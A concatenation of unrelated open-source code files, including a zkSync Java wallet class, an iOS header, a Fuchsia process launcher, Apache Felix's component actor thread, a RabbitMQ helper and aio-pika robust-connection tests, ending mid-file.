final SignedTransaction<Transfer> signedTransfer = buildSignedTransferTx(to, fee.getFeeToken(), amount,
fee.getFee(), nonceToUse, timeRange);
return submitSignedTransaction(signedTransfer.getTransaction(), signedTransfer.getEthereumSignature());
}
// Withdraws `amount` from L2 to Ethereum address `ethAddress`;
// fastProcessing is forwarded with the submission.
@Override
public String syncWithdraw(String ethAddress, BigInteger amount, TransactionFee fee, Integer nonce,
boolean fastProcessing, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<Withdraw> signedWithdraw = buildSignedWithdrawTx(ethAddress, fee.getFeeToken(), amount,
fee.getFee(), nonceToUse, timeRange);
return submitSignedTransaction(signedWithdraw.getTransaction(), signedWithdraw.getEthereumSignature()[0],
fastProcessing);
}
// Submits a forced exit for account `target`, fee paid in fee.getFeeToken().
@Override
public String syncForcedExit(String target, TransactionFee fee, Integer nonce, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<ForcedExit> signedForcedExit = buildSignedForcedExitTx(target, fee.getFeeToken(),
fee.getFee(), nonceToUse, timeRange);
return submitSignedTransaction(signedForcedExit.getTransaction(), signedForcedExit.getEthereumSignature());
}
// Mints an NFT with the given content hash to `recipient`.
@Override
public String syncMintNFT(String recipient, String contentHash, TransactionFee fee, Integer nonce) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<MintNFT> signedMintNFT = buildSignedMintNFTTx(recipient, contentHash, fee.getFeeToken(),
fee.getFee(), nonceToUse);
return submitSignedTransaction(signedMintNFT.getTransaction(), signedMintNFT.getEthereumSignature());
}
// Withdraws the given NFT from L2 to address `to`.
@Override
public String syncWithdrawNFT(String to, NFT token, TransactionFee fee, Integer nonce, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<WithdrawNFT> signedWithdrawNFT = buildSignedWithdrawNFTTx(to, token, fee.getFeeToken(), fee.getFee(), nonceToUse, timeRange);
return submitSignedTransaction(signedWithdrawNFT.getTransaction(), signedWithdrawNFT.getEthereumSignature());
}
// Transfers an NFT as a two-transaction batch: (1) the NFT itself with a
// zero fee, consuming `nonce`; (2) a zero-amount self-transfer in the fee
// token that carries the whole batch fee, consuming `nonce + 1`. Both are
// covered by a single batch Ethereum signature and submitted together.
@SneakyThrows
@Override
public List<String> syncTransferNFT(String to, NFT token, TransactionFee fee, Integer nonce, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final Tokens tokens = provider.getTokens();
// Resolve the fee token by symbol first, falling back to address lookup.
final Token feeToken = tokens.getTokenBySymbol(fee.getFeeToken()) != null ?
tokens.getTokenBySymbol(fee.getFeeToken()) : tokens.getTokenByAddress(fee.getFeeToken());
final Transfer transferNft = Transfer
.builder()
.accountId(this.getAccountId())
.from(ethSigner.getAddress())
.to(to)
.token(token.getId())
.tokenId(token)
.amount(BigInteger.ONE)
.nonce(nonceToUse)
.fee(BigInteger.ZERO.toString())
.timeRange(timeRange)
.build();
final Transfer transferFee = Transfer
.builder()
.accountId(this.getAccountId())
.from(ethSigner.getAddress())
.to(ethSigner.getAddress())
.token(feeToken.getId())
.tokenId(feeToken)
.amount(BigInteger.ZERO)
.nonce(nonceToUse + 1)
.fee(fee.getFee().toString())
.timeRange(timeRange)
.build();
EthSignature ethSignature = ethSigner.signBatch(Arrays.asList(transferNft, transferFee), nonceToUse, feeToken, fee.getFee()).get();
return submitSignedBatch(Arrays.asList(
zkSigner.signTransfer(transferNft),
zkSigner.signTransfer(transferFee)
), ethSignature);
}
// Submits a swap of two pre-signed orders. The wallet signs the Swap
// transaction itself; the Ethereum signatures of both orders are attached
// alongside the wallet's own signature.
@Override
public String syncSwap(Order order1, Order order2, BigInteger amount1, BigInteger amount2, TransactionFee fee, Integer nonce) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<Swap> signedSwap = buildSignedSwapTx(order1, order2, amount1, amount2, fee.getFeeToken(), fee.getFee(), nonceToUse);
return submitSignedTransaction(signedSwap.getTransaction(), signedSwap.getEthereumSignature()[0], order1.getEthereumSignature(), order2.getEthereumSignature());
}
// Builds an order selling `sell` for `buy` at the given price ratio, with
// proceeds sent to `recipient`. The order carries an Ethereum signature
// from the wallet's signer and is then zk-signed before being returned.
@Override
@SneakyThrows
public <T extends TokenId> Order buildSignedOrder(String recipient, T sell, T buy, Tuple2<BigInteger, BigInteger> ratio, BigInteger amount, Integer nonce, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
Order order = Order.builder()
.accountId(this.getAccountId())
.amount(amount)
.recipientAddress(recipient)
.tokenSell(sell.getId())
.tokenBuy(buy.getId())
.ratio(ratio)
.nonce(nonceToUse)
.timeRange(timeRange)
.build();
final EthSignature ethSignature = ethSigner.signOrder(order, sell, buy).get();
order.setEthereumSignature(ethSignature);
return zkSigner.signOrder(order);
}
// A limit order is built by delegating with amount = 0.
@Override
@SneakyThrows
public <T extends TokenId> Order buildSignedLimitOrder(String recipient, T sell, T buy, Tuple2<BigInteger, BigInteger> ratio,
Integer nonce, TimeRange timeRange) {
return this.buildSignedOrder(recipient, sell, buy, ratio, BigInteger.ZERO, nonce, timeRange);
}
// Fetches the current account state for this wallet's address.
@Override
public AccountState getState() {
return provider.getState(ethSigner.getAddress());
}
// True when the account's registered pubkey hash matches this wallet's
// ZkSigner key.
@Override
public boolean isSigningKeySet() {
return Objects.equals(this.getPubKeyHash(), this.zkSigner.getPublicKeyHash());
}
// Lazily loads and caches the zkSync account id.
@Override
public Integer getAccountId() {
if (this.accountId == null) {
this.loadAccountInfo();
}
return this.accountId;
}
// Lazily loads and caches the pubkey hash registered on the account.
@Override
public String getPubKeyHash() {
if (this.pubKeyHash == null) {
this.loadAccountInfo();
}
return this.pubKeyHash;
}
// Builds an L1 (Ethereum) provider bound to the zkSync main contract.
@Override
public EthereumProvider createEthereumProvider(Web3j web3j, ContractGasProvider contractGasProvider) {
String contractAddress = this.provider.contractAddress().getMainContract();
ZkSync contract = ZkSync.load(contractAddress, web3j, this.ethSigner.getTransactionManager(), contractGasProvider);
DefaultEthereumProvider ethereum = new DefaultEthereumProvider(web3j, this.ethSigner, contract);
return ethereum;
}
// The wallet's Ethereum address, taken from the Ethereum signer.
@Override
public String getAddress() {
return this.ethSigner.getAddress();
}
// Token registry as known by the zkSync provider.
@Override
public Tokens getTokens() {
return this.provider.getTokens();
}
// Enables two-factor authentication: signs a timestamped toggle message
// with the Ethereum signer and submits it to the provider.
@Override
public boolean enable2FA() {
final Long timestamp = System.currentTimeMillis();
final Integer accountId = this.getAccountId();
final EthSignature ethSignature = ethSigner.signToggle(true, timestamp).join();
final Toggle2FA toggle2Fa = new Toggle2FA(
true,
accountId,
timestamp,
ethSignature,
null
);
return provider.toggle2FA(toggle2Fa);
}
// Disables 2FA. When pubKeyHash is provided the signed message is bound to
// that specific key; otherwise the toggle applies without a key binding.
@Override
public boolean disable2FA(@Nullable String pubKeyHash) {
final Long timestamp = System.currentTimeMillis();
final Integer accountId = this.getAccountId();
final EthSignature ethSignature = (
Strings.isEmpty(pubKeyHash) ?
ethSigner.signToggle(false, timestamp) :
ethSigner.signToggle(false, timestamp, pubKeyHash)
).join();
final Toggle2FA toggle2Fa = new Toggle2FA(
false,
accountId,
timestamp,
ethSignature,
pubKeyHash
);
return provider.toggle2FA(toggle2Fa);
}
// Builds a ChangePubKey transaction authorized through the signer-specific
// variant A (the signer produces the auth data via signAuth), then attaches
// an Ethereum transaction signature and a zk signature.
// NOTE(review): throwing java.lang.Error for a missing ZkSigner is
// unconventional — IllegalStateException would be the normal choice; left
// unchanged in case callers depend on the current type.
@SneakyThrows
private SignedTransaction<ChangePubKey<A>> buildSignedChangePubKeyTx(TransactionFee fee, Integer nonce,
TimeRange timeRange) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Token token = provider.getTokens().getToken(fee.getFeeToken());
final ChangePubKey<A> changePubKey = ChangePubKey
.<A>builder()
.accountId(this.getAccountId())
.account(ethSigner.getAddress())
.newPkHash(zkSigner.getPublicKeyHash())
.nonce(nonce).feeToken(token.getId())
.fee(fee.getFee().toString())
.timeRange(timeRange)
.build();
final ChangePubKey<A> changePubKeyAuth = ethSigner.signAuth(changePubKey).get();
EthSignature ethSignature = ethSigner.signTransaction(changePubKey, nonce, token, fee.getFee()).get();
return new SignedTransaction<>(zkSigner.signChangePubKey(changePubKeyAuth), ethSignature);
}
// On-chain variant: the authorization happens via an on-chain call
// (ChangePubKeyOnchain marker), so no Ethereum signature accompanies the
// returned transaction — only the zk signature.
@SneakyThrows
private SignedTransaction<ChangePubKey<ChangePubKeyOnchain>> buildSignedChangePubKeyTxOnchain(TransactionFee fee, Integer nonce,
TimeRange timeRange) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Token token = provider.getTokens().getToken(fee.getFeeToken());
final ChangePubKey<ChangePubKeyOnchain> changePubKey = ChangePubKey
.<ChangePubKeyOnchain>builder()
.accountId(this.getAccountId())
.account(ethSigner.getAddress())
.newPkHash(zkSigner.getPublicKeyHash())
.nonce(nonce).feeToken(token.getId())
.fee(fee.getFee().toString())
.ethAuthData(new ChangePubKeyOnchain())
.timeRange(timeRange)
.build();
return new SignedTransaction<>(zkSigner.signChangePubKey(changePubKey));
}
@SneakyThrows
private SignedTransaction<Transfer> buildSignedTransferTx(String to,
String tokenIdentifier,
BigInteger amount,
BigInteger fee,
Integer nonce,
TimeRange timeRange) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Tokens tokens = provider.getTokens();
final Token token = tokens.getTokenBySymbol(tokenIdentifier) != null ?
tokens.getTokenBySymbol(tokenIdentifier) : tokens.getTokenByAddress(tokenIdentifier);
final Transfer transfer = Transfer
.builder()
.accountId(this.getAccountId())
.from(ethSigner.getAddress())
.to(to)
.token(token.getId())
.amount(amount)
.nonce(nonce)
.fee(fee.toString())
.timeRange(timeRange)
.build();
final EthSignature ethSignature = ethSigner.signTransaction(transfer, nonce, token, fee).get();
return new SignedTransaction<>(zkSigner.signTransfer(transfer), ethSignature);
}
@SneakyThrows
private SignedTransaction<Withdraw> buildSignedWithdrawTx(String to, String tokenIdentifier, BigInteger amount, BigInteger fee, Integer nonce, TimeRange timeRange) {
    // Builds a Withdraw (zkSync -> L1) transaction and signs it with both the
    // Ethereum signer and the zkSync signer.
    if (zkSigner == null) {
        throw new Error("ZKSync signer is required for current pubkey calculation.");
    }
    // Resolve the token once: symbol lookup first, then address fallback.
    // (Previously getTokenBySymbol was invoked twice for the same identifier.)
    final Tokens tokens = provider.getTokens();
    Token token = tokens.getTokenBySymbol(tokenIdentifier);
    if (token == null) {
        token = tokens.getTokenByAddress(tokenIdentifier);
    }
    final Withdraw withdraw = Withdraw
            .builder()
            .accountId(this.getAccountId())
            .from(ethSigner.getAddress())
            .to(to)
            .token(token.getId())
            .amount(amount)
            .nonce(nonce)
            .fee(fee.toString())
            .timeRange(timeRange)
            .build();
    final EthSignature ethSignature = ethSigner.signTransaction(withdraw, nonce, token, fee).get();
    return new SignedTransaction<>(zkSigner.signWithdraw(withdraw), ethSignature);
}
@SneakyThrows
private SignedTransaction<ForcedExit> buildSignedForcedExitTx(String target,
                                                              String tokenIdentifier,
                                                              BigInteger fee,
                                                              Integer nonce,
                                                              TimeRange timeRange) {
    // Builds a ForcedExit for the given target address, initiated by this
    // wallet's account, and signs it with both signers.
    if (zkSigner == null) {
        throw new Error("ZKSync signer is required for current pubkey calculation.");
    }
    // Unlike the transfer/withdraw builders, the token is resolved via
    // Tokens.getToken(identifier) directly.
    final Tokens tokens = provider.getTokens();
    final Token token = tokens.getToken(tokenIdentifier);
    final ForcedExit forcedExit = ForcedExit
            .builder()
            .initiatorAccountId(this.getAccountId())
            .target(target)
            .token(token.getId())
            .nonce(nonce)
            .fee(fee.toString())
            .timeRange(timeRange)
            .build();
    final EthSignature ethSignature = ethSigner.signTransaction(forcedExit, nonce, token, fee).get();
    return new SignedTransaction<>(zkSigner.signForcedExit(forcedExit), ethSignature);
}
@SneakyThrows
private SignedTransaction<MintNFT> buildSignedMintNFTTx(String to, String contentHash, String tokenIdentifier, BigInteger fee, Integer nonce) {
    // Builds a MintNFT transaction: this wallet's account is the creator,
    // {@code to} the recipient, {@code contentHash} the NFT content reference.
    // Signed with both the Ethereum and the zkSync signer.
    if (zkSigner == null) {
        throw new Error("ZKSync signer is required for current pubkey calculation.");
    }
    // tokenIdentifier names the token the fee is paid in.
    final Tokens tokens = provider.getTokens();
    final Token token = tokens.getToken(tokenIdentifier);
    final MintNFT mintNft = MintNFT
            .builder()
            .creatorId(this.getAccountId())
            .creatorAddress(ethSigner.getAddress())
            .contentHash(contentHash)
            .recipient(to)
            .fee(fee.toString())
            .feeToken(token.getId())
            .nonce(nonce)
            .build();
    final EthSignature ethSignature = ethSigner.signTransaction(mintNft, nonce, token, fee).get();
    return new SignedTransaction<>(zkSigner.signMintNFT(mintNft), ethSignature);
}
@SneakyThrows
private SignedTransaction<WithdrawNFT> buildSignedWithdrawNFTTx(String to, NFT token, String tokenIdentifier, BigInteger fee, Integer nonce, TimeRange timeRange) {
    // Builds a WithdrawNFT transaction: {@code token} is the NFT being
    // withdrawn, {@code tokenIdentifier} names the (fungible) token the fee
    // is paid in.  Signed with both signers.
    if (zkSigner == null) {
        throw new Error("ZKSync signer is required for current pubkey calculation.");
    }
    final Tokens tokens = provider.getTokens();
    final Token feeToken = tokens.getToken(tokenIdentifier);
    final WithdrawNFT withdrawNFT = WithdrawNFT
            .builder()
            .accountId(this.getAccountId())
            .from(ethSigner.getAddress())
            .to(to)
            .token(token.getId())
            .nonce(nonce)
            .fee(fee.toString())
            .feeToken(feeToken.getId())
            .timeRange(timeRange)
            .build();
    // Note the Ethereum signature is computed against the fee token, not the NFT.
    final EthSignature ethSignature = ethSigner.signTransaction(withdrawNFT, nonce, feeToken, fee).get();
    return new SignedTransaction<>(zkSigner.signWithdrawNFT(withdrawNFT), ethSignature);
}
@SneakyThrows
private SignedTransaction<Swap> buildSignedSwapTx(Order order1, Order order2, BigInteger amount1, BigInteger amount2, String tokenIdentifier, BigInteger fee, Integer nonce) {
    // Builds a Swap submitting the two matched orders with their respective
    // amounts; this wallet acts as the submitter and pays the fee in the
    // token named by tokenIdentifier.  Signed with both signers.
    if (zkSigner == null) {
        throw new Error("ZKSync signer is required for current pubkey calculation.");
    }
    final Tokens tokens = provider.getTokens();
    final Token feeToken = tokens.getToken(tokenIdentifier);
    final Swap swap = Swap.builder()
            .orders(new Tuple2<>(order1, order2))
            .submitterAddress(this.ethSigner.getAddress())
            .submitterId(this.getAccountId())
            .amounts(new Tuple2<>(amount1, amount2))
            .nonce(nonce)
            .fee(fee.toString())
            .feeToken(feeToken.getId())
            .build();
    final EthSignature ethSignature = ethSigner.signTransaction(swap, nonce, feeToken, fee).get();
    return new SignedTransaction<>(zkSigner.signSwap(swap), ethSignature);
}
// Submits a single signed transaction to the provider; fastProcessing is
// forwarded unchanged.  Returns the transaction hash reported by the server.
private String submitSignedTransaction(ZkSyncTransaction signedTransaction,
                                       EthSignature ethereumSignature,
                                       boolean fastProcessing) {
    return provider.submitTx(signedTransaction, ethereumSignature, fastProcessing);
}
// Varargs overload: dispatches to the provider call matching how many
// Ethereum signatures were supplied (none, exactly one, or several).
private String submitSignedTransaction(ZkSyncTransaction signedTransaction,
                                       EthSignature... ethereumSignature) {
    final int signatureCount = (ethereumSignature == null) ? 0 : ethereumSignature.length;
    switch (signatureCount) {
        case 0:
            // No Ethereum signature; fast processing disabled.
            return provider.submitTx(signedTransaction, null, false);
        case 1:
            return provider.submitTx(signedTransaction, ethereumSignature[0], false);
        default:
            // Multiple signatures are forwarded as an array.
            return provider.submitTx(signedTransaction, ethereumSignature);
    }
}
// Submits a batch of transactions with a single batch-level Ethereum
// signature; each per-transaction signature slot is left null.
private List<String> submitSignedBatch(List<ZkSyncTransaction> transactions, EthSignature ethereumSignature) {
    final List<Pair<ZkSyncTransaction, EthSignature>> batch = transactions.stream()
            .map(tx -> Pair.of(tx, (EthSignature) null))
            .collect(Collectors.toList());
    return provider.submitTxBatch(batch, ethereumSignature);
}
// The next valid nonce is taken from the committed account state.
private Integer getNonce() {
    final AccountState state = getState();
    return state.getCommitted().getNonce();
}
// Caches the account id and the committed public-key hash from the current
// server-side account state.
private void loadAccountInfo() {
    final AccountState state = getState();
    this.accountId = state.getId();
    this.pubKeyHash = state.getCommitted().getPubKeyHash();
}
// Public entry point: submits an already-signed transaction together with
// its Ethereum signature (may be null per the varargs overload's handling).
@Override
public <T extends ZkSyncTransaction> String submitTransaction(SignedTransaction<T> transaction) {
    return submitSignedTransaction(transaction.getTransaction(), transaction.getEthereumSignature());
}
}
|
AK403/WXFloatWeb
|
WXFloatSDK/WXFloatSDK/Transition/WXFloatPopTransition.h
|
//
//  WXFloatPopTransition.h
//  WXFloatSDK
//
//  Created by AK403 on 2018/8/24.
//  Copyright © 2018 AK403. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <UIKit/UIKit.h>

/// Custom view-controller transition animator used by WXFloatSDK.
/// Conforms to UIViewControllerAnimatedTransitioning, so instances are
/// returned from transitioning-delegate callbacks.
/// NOTE(review): judging by the name this drives the "pop" (back) transition —
/// confirm against the delegate that vends it.
@interface WXFloatPopTransition : NSObject<UIViewControllerAnimatedTransitioning>

/// YES while the transition is being driven interactively (e.g. by a gesture)
/// rather than running as a fixed-duration animation.
@property(nonatomic, assign)BOOL isInteracting;

/// View controller that coordinates/responds to this transition.
/// Weak to avoid a retain cycle with the controller owning the animator.
@property (nonatomic, weak) UIViewController* animatedTransitionRespondViewController;

@end
|
open-garden/garden
|
Zipc_Webplatform/src/com/zipc/garden/webplatform/client/editor/ace/Autocomplete.java
|
package com.zipc.garden.webplatform.client.editor.ace;
import jsinterop.annotations.JsPackage;
import jsinterop.annotations.JsType;
/**
 * JsInterop binding for the global Ace.js {@code Autocomplete} object
 * ({@link Ace}). Manages Ace's auto-completion popup. All methods are
 * {@code native}: calls are forwarded to the underlying JavaScript object.
 */
@JsType(isNative = true, namespace = JsPackage.GLOBAL, name = "Autocomplete")
public class Autocomplete {

    /** Returns the completion popup as an opaque JavaScript object. */
    public native JsObject getPopup();

    /** Shows the completion popup for the given editor. */
    public native void showPopup(Editor editor);

    /** Cancels the (context-menu) popup interaction. */
    public native void cancelContextMenu();

    /** Detaches the autocomplete UI from the editor. */
    public native void detach();
}
|
arve0/es6-transpiler
|
tests/xdollarzero-out.js
|
<reponame>arve0/es6-transpiler<filename>tests/xdollarzero-out.js
"use strict";
var x$0;
var x;
{ var x$1 = void 0; }
|
zhangpf/fuchsia-rs
|
zircon/system/utest/spawn/launcher.c
|
<gh_stars>1-10
// Copyright 2018 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include <launchpad/launchpad.h>
#include <zircon/syscalls.h>
#include <string.h>
// Launches the program named by argv[1] (forwarding argv[1..] as its argv and
// cloning the full environment), waits for it to terminate, and propagates its
// return code.  Returns 401 when the launch itself cannot be performed.
int main(int argc, const char* const* argv) {
    // Guard: argv[1] is dereferenced below; without this check a missing
    // argument would read past the argument vector.
    if (argc < 2)
        return 401;
    launchpad_t* lp = NULL;
    launchpad_create(ZX_HANDLE_INVALID, "launcher-child", &lp);
    launchpad_load_from_file(lp, argv[1]);
    // The child sees argv[1] as its own argv[0].
    launchpad_set_args(lp, argc - 1, argv + 1);
    launchpad_clone(lp, LP_CLONE_ALL);
    zx_handle_t process = ZX_HANDLE_INVALID;
    zx_status_t status = launchpad_go(lp, &process, NULL);
    if (status != ZX_OK)
        return 401;
    // Block until the child process terminates.
    status = zx_object_wait_one(process, ZX_TASK_TERMINATED, ZX_TIME_INFINITE, NULL);
    if (status != ZX_OK)
        return status;
    zx_info_process_t proc_info;
    memset(&proc_info, 0, sizeof(proc_info));
    status = zx_object_get_info(process, ZX_INFO_PROCESS, &proc_info, sizeof(proc_info), NULL, NULL);
    if (status != ZX_OK)
        return status;
    // Propagate the child's exit code as our own.
    return proc_info.return_code;
}
|
veriktig/scandium
|
old-external/felix/osgi-r7/scr/src/main/java/org/apache/felix/scr/impl/ComponentActorThread.java
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.felix.scr.impl;
import java.util.LinkedList;
import org.apache.felix.scr.impl.logger.ScrLogger;
import org.osgi.service.log.LogService;
/**
 * The <code>ComponentActorThread</code> is the thread used to act upon registered
 * components of the service component runtime.
 * <p>
 * Thread-safety: all access to the task queue is synchronized on {@code tasks};
 * {@link #schedule(Runnable)} may be called from any thread, while
 * {@link #run()} is executed by a single dedicated thread.
 */
class ComponentActorThread implements Runnable
{

    // sentinel task to terminate this thread
    private static final Runnable TERMINATION_TASK = new Runnable()
    {
        @Override
        public void run()
        {
        }

        @Override
        public String toString()
        {
            return "Component Actor Terminator";
        }
    };

    // the queue of Runnable instances to be run
    private final LinkedList<Runnable> tasks = new LinkedList<>();

    private final ScrLogger logger;

    ComponentActorThread( final ScrLogger log )
    {
        logger = log;
    }

    // waits on Runnable instances coming into the queue. As instances come
    // in, this method calls the Runnable.run method, logs any exception
    // happening and keeps on waiting for the next Runnable. If the Runnable
    // taken from the queue is this thread instance itself, the thread
    // terminates.
    @Override
    public void run()
    {
        logger.log( LogService.LOG_DEBUG, "Starting ComponentActorThread", null );
        for ( ;; )
        {
            final Runnable task;
            synchronized ( tasks )
            {
                while ( tasks.isEmpty() )
                {
                    // Remember a pre-existing interrupt so it can be restored
                    // after the wait loop (wait() clears/throws on interrupt).
                    boolean interrupted = Thread.interrupted();
                    try
                    {
                        tasks.wait();
                    }
                    catch ( InterruptedException ie )
                    {
                        interrupted = true;
                        // don't care
                    }
                    finally
                    {
                        if (interrupted)
                        { // restore interrupt status
                            Thread.currentThread().interrupt();
                        }
                    }
                }
                task = tasks.removeFirst();
            }
            try
            {
                // return if the task is this thread itself
                if ( task == TERMINATION_TASK )
                {
                    logger.log( LogService.LOG_DEBUG, "Shutting down ComponentActorThread", null );
                    return;
                }
                // otherwise execute the task, log any issues
                logger.log( LogService.LOG_DEBUG, "Running task: " + task, null );
                task.run();
            }
            catch ( Throwable t )
            {
                logger.log( LogService.LOG_ERROR, "Unexpected problem executing task " + task, t );
            }
            finally
            {
                // Wake terminate(), which waits for the queue to drain, so it
                // can re-check emptiness after each completed task.
                synchronized ( tasks )
                {
                    tasks.notifyAll();
                }
            }
        }
    }

    // cause this thread to terminate by adding this thread to the end
    // of the queue
    void terminate()
    {
        schedule( TERMINATION_TASK );
        // Block until all queued tasks (including the terminator) have been
        // taken off the queue by run().
        synchronized ( tasks )
        {
            while ( !tasks.isEmpty() )
            {
                boolean interrupted = Thread.interrupted();
                try
                {
                    tasks.wait();
                }
                catch ( InterruptedException e )
                {
                    interrupted = true;
                    logger.log(LogService.LOG_ERROR,
                        "Interrupted exception waiting for queue to empty", e);
                }
                finally
                {
                    if (interrupted)
                    { // restore interrupt status
                        Thread.currentThread().interrupt();
                    }
                }
            }
        }
    }

    // queue the given runnable to be run as soon as possible
    void schedule( Runnable task )
    {
        synchronized ( tasks )
        {
            // append to the task queue
            tasks.add( task );
            // NOTE(review): the trailing null after tasks.size() looks like a
            // leftover varargs slot — confirm against ScrLogger.log's signature.
            logger.log( LogService.LOG_DEBUG, "Adding task [{0}] as #{1} in the queue", null,
                task, tasks.size(), null );
            // notify the waiting thread
            tasks.notifyAll();
        }
    }
}
|
husirb/cabloy
|
src/module/test-flow/backend/src/controller/flow.js
|
// Backend controller for the test-flow module: exposes flow-engine actions.
module.exports = app => {
  class FlowController extends app.Controller {
    // Starts a new flow instance.  flowDefKey selects the flow definition,
    // flowVars seeds the instance variables, and the current operating user
    // becomes the flow's user.
    async start() {
      await this.ctx.bean.flow.startByKey({
        flowDefKey: this.ctx.request.body.flowDefKey,
        flowVars: this.ctx.request.body.flowVars,
        flowUserId: this.ctx.state.user.op.id,
      });
      // Respond with the framework's standard success envelope.
      this.ctx.success();
    }
  }
  return FlowController;
};
|
goldylucks/zenwallet
|
app/components/AppUpdater/__tests__/appUpdate.spec.js
|
import { get } from 'axios'
import { checkForUpdates, LATEST_RELEASE_URL } from '../appUpdate'
jest.mock('axios', () => ({
get: jest.fn(),
}))
jest.spyOn(global.console, 'error').mockImplementation(() => {})
jest.mock('../../../../package.json', () => ({
version: '1.2.2',
}))
afterEach(() => {
get.mockReset()
})
describe('checkForUpdates', () => {
describe('when api returns assets with same version', () => {
beforeEach(() => {
const testPayload = {
data: {
tag_name: 'v1.2.2',
assets: [
{ browser_download_url: 'test.dmg' },
{ browser_download_url: 'test.exe' },
{ browser_download_url: 'test.tar.gz' },
],
},
}
get.mockReturnValue(testPayload)
})
it('returns undefined', async () => {
const updateLink = await checkForUpdates('darwin')
expect(updateLink).toEqual(undefined)
})
})
describe('when api returns assets with greater version', () => {
beforeEach(() => {
const testPayload = {
data: {
tag_name: 'v1.2.3',
assets: [
{ browser_download_url: 'test.dmg' },
{ browser_download_url: 'test.exe' },
{ browser_download_url: 'test.tar.gz' },
],
},
}
get.mockReturnValue(testPayload)
})
it('returns test.dmg for mac', async () => {
const updateLink = await checkForUpdates('darwin')
expect(updateLink).toEqual('test.dmg')
})
it('returns test.exe for windows', async () => {
const updateLink = await checkForUpdates('win32')
expect(updateLink).toEqual('test.exe')
})
it('returns test.tar.gx for linux', async () => {
const updateLink = await checkForUpdates('linux')
expect(updateLink).toEqual('test.tar.gz')
})
it('returns the release url for unknown os', async () => {
const updateLink = await checkForUpdates('freebsd')
expect(updateLink).toEqual(LATEST_RELEASE_URL)
})
})
describe('when api throws error', () => {
beforeEach(() => {
get.mockReturnValue(Promise.reject(new Error()))
})
it('returns undefined', async () => {
const updateLink = await checkForUpdates('freebsd')
expect(updateLink).toEqual(undefined)
})
})
})
|
nobejs/files
|
core/utils/rabbitSendMessage.js
|
const amqp = require("amqplib");

/**
 * Publishes a persistent message to a durable queue.
 *
 * @param {string} amqp_endpoint AMQP connection URL.
 * @param {string} q             Queue name (asserted durable before sending).
 * @param {string|Buffer} message Message body.
 * @returns {Promise<void>} resolves once the connection has been closed;
 *   rejects with the underlying error on failure.
 *
 * Fixes over the previous version: the `new Promise(async ...)` executor
 * anti-pattern is gone (an async function already returns a promise), and the
 * connection is now closed on the error path too, instead of being leaked
 * when createChannel/assertQueue/sendToQueue throws after a successful connect.
 */
const rabbitSendMessage = async (amqp_endpoint, q, message) => {
  let conn;
  try {
    conn = await amqp.connect(amqp_endpoint);
    const ch = await conn.createChannel();
    await ch.assertQueue(q, { durable: true });
    ch.sendToQueue(q, Buffer.from(message), { persistent: true });
    // Keep the original 500 ms grace period so buffered data is flushed
    // before the connection is torn down.
    await new Promise((resolve) => setTimeout(resolve, 500));
    await conn.close();
  } catch (error) {
    console.log("error", error);
    if (conn) {
      // Best-effort cleanup; the original error is what gets propagated.
      try {
        await conn.close();
      } catch (closeError) {
        // ignore: connection may already be closing
      }
    }
    throw error;
  }
};

module.exports = rabbitSendMessage;
|
homersoft/aio-pika
|
tests/test_amqp_robust.py
|
<filename>tests/test_amqp_robust.py
import asyncio
import time
from functools import partial
import pytest
import aio_pika
from aio_pika import RobustChannel
from tests.test_amqp import (
TestCaseAmqp, TestCaseAmqpNoConfirms, TestCaseAmqpWithConfirms,
)
@pytest.fixture
def connection_fabric():
    # Factory fixture: the robust connect variant, which reconnects
    # automatically after broker failures.
    return aio_pika.connect_robust
@pytest.fixture
def create_connection(connection_fabric, loop, amqp_url):
    # Zero-argument callable that opens a connection with the configured
    # broker URL and event loop already bound.
    return partial(connection_fabric, amqp_url, loop=loop)
class TestCaseNoRobust(TestCaseAmqp):
    # Run the inherited AMQP test-suite twice: once with robust (auto-restoring)
    # queues/exchanges and once without.
    PARAMS = [{"robust": True}, {"robust": False}]
    IDS = ["robust=1", "robust=0"]

    @staticmethod
    @pytest.fixture(name="declare_queue", params=PARAMS, ids=IDS)
    def declare_queue_(request, declare_queue):
        # Wraps the base declare_queue fixture, injecting the robust flag.
        async def fabric(*args, **kwargs) -> aio_pika.Queue:
            kwargs.update(request.param)
            return await declare_queue(*args, **kwargs)
        return fabric

    @staticmethod
    @pytest.fixture(name="declare_exchange", params=PARAMS, ids=IDS)
    def declare_exchange_(request, declare_exchange):
        # Same parametrized wrapping for exchange declaration.
        async def fabric(*args, **kwargs) -> aio_pika.Queue:
            kwargs.update(request.param)
            return await declare_exchange(*args, **kwargs)
        return fabric

    async def test_add_reconnect_callback(self, create_connection):
        # The callback registry must keep a strong reference: deleting the
        # local name must not drop the registered callback.
        connection = await create_connection()

        def cb(*a, **kw):
            pass

        connection.reconnect_callbacks.add(cb)
        del cb
        assert len(connection.reconnect_callbacks) == 1

    async def test_channel_blocking_timeout_reopen(self, connection):
        # Scenario: an operation blocks the event loop (time.sleep) so the
        # outer wait_for times out; the channel should then be closed and
        # subsequently reopened by the robust machinery.
        channel: RobustChannel = await connection.channel()  # type: ignore
        close_reasons = []
        close_event = asyncio.Event()
